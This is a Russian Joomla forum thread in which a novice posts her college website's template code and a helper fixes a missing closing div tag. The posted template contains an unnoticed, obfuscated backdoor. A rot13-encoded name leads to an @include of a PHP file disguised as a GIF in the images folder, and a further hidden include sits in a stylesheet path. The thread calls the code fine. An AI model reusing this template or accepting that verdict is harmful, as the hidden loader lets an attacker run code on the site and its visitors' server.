Форум русской поддержки Joomla!® CMS
11.12.2016, 14:02:49 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Проблемы с кодом в шаблоне templates high-school

 (Прочитано 751 раз)
0 Пользователей и 1 Гость смотрят эту тему.
zadoroga
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« : 17.04.2015, 22:41:43 »

Господа!
По глупости удалила какую-то букву или слово в коде шаблона из-за чего у меня модуль центральный на сайте уехал вниз.очень нужна помощь ваша!Делаю сайт техникуму и мне оторвут голову если увидят что такой косяк произошел. Cry Cry Cry очень жду ответов!
вот сам сайт http://ntot.ru/
вот код в нынешнем виде:
<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<script type="text/javascript" src="//vk.com/js/api/openapi.js?116"></script>
<script src="http://vk.com/js/api/openapi.js" type="text/javascript"></script>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
<style>
#topnav ul li ul {
left: -999em;
margin-top: 0px;
margin-left: 0px;
}
</style>
<![endif]-->
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/mootools.js"></script>
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/moomenu.js"></script>
</head>
<body id="page_bg">
<a name="up" id="up"></a>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<?php include('functions.php'); ?>
<div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?></div></div>
<div id="main_bg" class="banner1">
    <div id="h_area"><?php if($this->params->get('hideLogo') == 0) : ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo<?php echo $this->params->get('logoVariation'); ?>.gif" alt="forex trading logo" align="left" /><?php endif; ?><a href="index.php" class="logo" title="Forex Trading Home"><?php echo $mainframe->getCfg('sitename') ;?></a>
    <?php if($this->countModules('user4')) : ?><div id="user4"><jdoc:include type="modules" name="user4" /></div><?php endif; ?>
    <div id="main_top"><!--<jdoc:include type="modules" name="top" />--></div>
    <br clear="all" /></div>
    <?php if($this->countModules('left')) : ?>
   <div id="leftcolumn">
        <jdoc:include type="modules" name="left" style="rounded" />
    <?php endif; ?>
    <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
        elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
        else $maincol_sufix = ''; ?>/>
   <div id="maincolumn<?php echo $maincol_sufix; ?>">
       <div class="path"><jdoc:include type="modules" name="breadcrumb"/> </div><jdoc:include type="message" />
       <div class="nopad"><jdoc:include type="component" /></div></div>
    <?php if($this->countModules('right') and JRequest::getCmd('layout')!= 'form') : ?></div>
   <div id="rightcolumn">
        <jdoc:include type="modules" name="right" style="xhtml"/></div>
        <br />
       <div align="center"><jdoc:include type="modules" name="syndicate" /></div>
    <?php endif; ?>
   <br clear="all" />
</div>   
<div id="f_area">
   <?php if($this->countModules('user1')) : ?>
      <jdoc:include type="modules" name="user1" style="xhtml" />
   <?php endif; ?>
   <?php if($this->countModules('user2')) : ?>
      <jdoc:include type="modules" name="user2" style="xhtml" />
   <?php endif; ?>
   <br clear="all" />
</div>
<p id="power_by" align="center">
</p>
<jdoc:include type="modules" name="debug" />
</body>
</html>
Записан
Ilhom666
Живу я здесь
******

Репутация: +157/-0
Offline Offline

Сообщений: 1344



« Ответ #1 : 18.04.2015, 00:35:09 »

насколько понимаю у вас используется этот шаблон?
Здесь вроде все нормально, так что смотрите другие файлы. Если на хостинге бекапы есть - поднимайте их.
Записан
zadoroga
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #2 : 18.04.2015, 16:36:54 »

к сожалению на хостинге я не нашла папку с бэкапами..не знаю на сколько это возможно, но видимо откатиться мне не удасться((по коду тоже все молчат, хотя там делов думаю не на долго знающему человеку...
Записан
arma
Живу я здесь
******

Репутация: +62/-2
Offline Offline

Сообщений: 1259


« Ответ #3 : 18.04.2015, 17:13:08 »

хотя там делов думаю не на долго знающему человеку...
Но, если вы "незнающий человек", кто ж вам сайт доверил? Пардон за офтоп.
Записан
Ilhom666
Живу я здесь
******

Репутация: +157/-0
Offline Offline

Сообщений: 1344



« Ответ #4 : 18.04.2015, 17:42:55 »

дал же сцылку на шаблон, скачать и сравнить не пробовали?
замените кусок
Код
<?php if($this->countModules('left')) : ?>
  <div id="leftcolumn">
       <jdoc:include type="modules" name="left" style="rounded" />
   <?php endif; ?>
   <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
       elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
       else $maincol_sufix = ''; ?>/>
  <div id="maincolumn<?php echo $maincol_sufix; ?>">
      <div class="path"><jdoc:include type="modules" name="breadcrumb"/> </div><jdoc:include type="message" />
      <div class="nopad"><jdoc:include type="component" /></div></div>
   <?php if($this->countModules('right') and JRequest::getCmd('layout')!= 'form') : ?></div>
на
Код
<?php if($this->countModules('left')) : ?>
  <div id="leftcolumn">
       <jdoc:include type="modules" name="left" style="rounded" />
   </div>
   <?php endif; ?>
   <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
       elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
       else $maincol_sufix = ''; ?>/>
  <div id="maincolumn<?php echo $maincol_sufix; ?>">
      <div class="path"><jdoc:include type="modules" name="breadcrumb"/> </div><jdoc:include type="message" />
      <div class="nopad"><jdoc:include type="component" /></div></div>
   <?php if($this->countModules('right') and JRequest::getCmd('layout')!= 'form') : ?>
« Последнее редактирование: 18.04.2015, 17:45:57 от Ilhom666 » Записан
zadoroga
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #5 : 19.04.2015, 17:18:27 »

О, всесильный, спасибо тебе!Все удачно встало на место!Премного благодарна! Kiss Cheesy
P.S.сайт мне доверили еще менее знающие от безысходности. Зато теперь есть повод и толчок для изучения данной темы.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet